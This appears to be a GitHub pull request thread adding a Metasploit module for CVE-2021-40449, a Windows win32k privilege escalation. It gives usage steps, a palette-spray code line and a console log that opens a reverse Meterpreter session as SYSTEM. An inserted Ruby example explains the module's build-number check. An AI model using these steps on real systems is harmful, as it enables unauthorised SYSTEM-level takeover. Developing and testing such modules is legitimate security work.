
Add Exploit for CVE-2021-40449 #15834

Merged (3 commits) on Nov 9, 2021

Conversation

gwillcox-r7 (Contributor) wrote:

Add in an exploit for CVE-2021-40449 as described as being exploited in the wild at https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/. Work was taken from the POC at https://github.com/ly4k/CallbackHell from @ly4k, which builds off of the work at https://github.com/KaLendsi/CVE-2021-40449-Exploit from @KaLendsi. Additional info came from https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ and the Red Raindrop Team of the Qi'anxin Threat Intelligence Center who did a very detailed writeup of this vulnerability.

This exploit should work against Windows 10 x64 builds 14393 and 17763; however, it should also work against older versions of Windows 10 as well. Newer versions of Windows 10 introduced additional protections that may make some of the exploit techniques utilized by this exploit irrelevant, so I'm not sure how exploitation fares on newer versions of Windows; however, it's likely that older versions such as Windows 7 could also be exploited with some tweaks to this exploit.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Gain a shell on a Windows 10 x64 machine running build 17763 that has not gotten the October 2021 patches yet.
  • use exploit/windows/local/cve_2021_40449
  • Set the settings appropriately for SESSION, LHOST, etc.
  • exploit
  • Verify you get a shell as SYSTEM.
  • Document any issues encountered

@gwillcox-r7 gwillcox-r7 added module docs needs-linting The module needs additional work to pass our automated linting rules labels Nov 5, 2021
github-actions bot commented Nov 5, 2021

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@gwillcox-r7 gwillcox-r7 changed the title First draft of code, documentation, and exploit DLL plus exploit code Add Exploit for CVE-2021-40449 Nov 5, 2021
@gwillcox-r7 gwillcox-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Nov 5, 2021

//puts("[*] Spraying palettes");

SprayPalettes(0xe20);
A contributor commented on this line:

This should be 0xe98 for Microsoft Windows [Version 10.0.17763.1] but I'm not sure how it's calculated for other versions.

gwillcox-r7 (author) replied:

Odd, see the documentation, I tested this on a 10.0.17763 install with fairly recent patches and this worked fine. Are you implying that something changed the structures between when 10.0.17763 first came out and the latest patches? I would find that hard to believe given most of these structures stay the same between major releases but it is possible, just would want to see some more evidence given this worked for me in my tests so that we know specifically what was changed and address it appropriately.

Keep in mind this code is taken from https://github.com/ly4k/CallbackHell; I have not modified @ly4k's code very much; mainly made some minor changes to get things to compile without warnings where possible and made some type changes where it made sense. The logic of the code should still be the same though as I didn't touch anything like this.

The contributor replied:

Apologies 0xe20 works too

gwillcox-r7 (author) replied:

All good, was just curious if I had missed something :) I'll leave this issue open in case we encounter problems down the line though; it will be good to reference this to check if it's related.

timwr (Contributor) commented Nov 7, 2021

Confirmed working on Windows 10 1809

msf6 exploit(windows/local/cve_2021_40449) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 192.168.0.18:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target's build number: 10.0.17763.1
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching msiexec to host the DLL...
[+] Process 5056 launched.
[*] Reflectively injecting the DLL into 5056...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.0.18
[*] Meterpreter session 2 opened (192.168.0.18:5555 -> 192.168.0.18:33542 ) at 2021-11-07 23:43:49 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
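The "Running automatic check" lines in the output above show the module gating on the target's reported build number before it launches the DLL. The Ruby below is an added illustration of that kind of build-number gate; it is not the check method from this PR's module and is not code from the Metasploit project. It assumes (labelled as such in the code) that the vulnerable build set is only the two builds the PR description says were tested (14393 and 17763), that the target must be x64, and that the function and constant names (`classify_target`, `VULNERABLE_BUILDS`, `parse_windows_version`) are invented for the example.

```ruby
# Added illustration, not the Metasploit module's own check code.
# Assumptions: the vulnerable build set is limited to the two builds the PR
# says the module was tested on (14393 = v1607, 17763 = v1809); the module's
# real list may differ. All names here are made up for the example.

# Windows 10 kernel build number -> marketing version (constructed for this
# example from the builds named in the PR).
VULNERABLE_BUILDS = {
  14393 => '1607',
  17763 => '1809'
}.freeze

# Parse a "10.0.17763.1"-style string into [major, minor, build, ubr].
# Returns nil for anything that is not a four-part numeric Windows version.
def parse_windows_version(str)
  parts = str.to_s.strip.split('.')
  return nil unless parts.length == 4 && parts.all? { |p| p.match?(/\A\d+\z/) }
  parts.map(&:to_i)
end

# Classify a target from its version string and architecture.
# Returns [status, reason], where status is one of :vulnerable, :safe, :unknown,
# mirroring the CheckCode categories a local exploit's check method reports.
#
# Caveat: the fourth component (the UBR) is what would distinguish a host that
# received the October 2021 fix from one that did not. The patched UBR values
# are not given in this thread, so this example only matches on the build
# number and deliberately does not claim to know patch state.
def classify_target(version_str, arch: 'x64')
  v = parse_windows_version(version_str)
  return [:unknown, 'Could not parse the target version string'] if v.nil?

  major, minor, build, _ubr = v
  # Assumption: the module only supports x64 targets, so other arches are Safe.
  return [:safe, 'Module only targets x64'] unless arch == 'x64'
  return [:safe, "Not Windows 10 (reported #{major}.#{minor})"] unless major == 10 && minor == 0

  if VULNERABLE_BUILDS.key?(build)
    [:vulnerable, "Vulnerable Windows 10 v#{VULNERABLE_BUILDS[build]} build detected!"]
  else
    [:unknown, "Windows 10 build #{build} has not been tested with this exploit"]
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs: the build from the thread, the other tested
  # build, a newer untested build, a Windows 7 version and garbage.
  ['10.0.17763.1', '10.0.14393.0', '10.0.19043.1288', '6.1.7601.1', 'garbage'].each do |ver|
    status, reason = classify_target(ver)
    puts format('%-16s -> %-11s %s', ver, status, reason)
  end
end
```

Read with the thread in mind: a :vulnerable result from this kind of check means "the build is one the exploit has been run against", not "the October 2021 patch is absent". On a patched 17763 host the build number is unchanged and only the UBR moves, so the module's own AutoCheck output ("appears to be vulnerable") should be treated as a build match rather than proof of an unpatched kernel.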

smcintyre-r7 (Contributor) left a comment:

You should take a look at external/source/include/windows/definitions.h which includes a bunch of definitions that you have here. Should be able to include that rather than redefining them here.

gwillcox-r7 (author) replied:

@smcintyre-r7 @h00die 9f9942f should incorporate the rest of both of your feedback.

timwr (Contributor) left a comment:

LGTM. Nice work.
I can land this once the tests pass

@timwr timwr merged commit 0b50f58 into rapid7:master Nov 9, 2021
timwr commented Nov 9, 2021

Release notes

Adds a module for CVE-2021-40449, aka CallbackHell, a Windows local privilege escalation exploit caused by a use-after-free during the NtGdiResetDC callback in vulnerable versions of win32k.sys.

@gwillcox-r7 gwillcox-r7 deleted the CVE-2021-40449 branch November 9, 2021 18:16
@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 12, 2021
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)
4 participants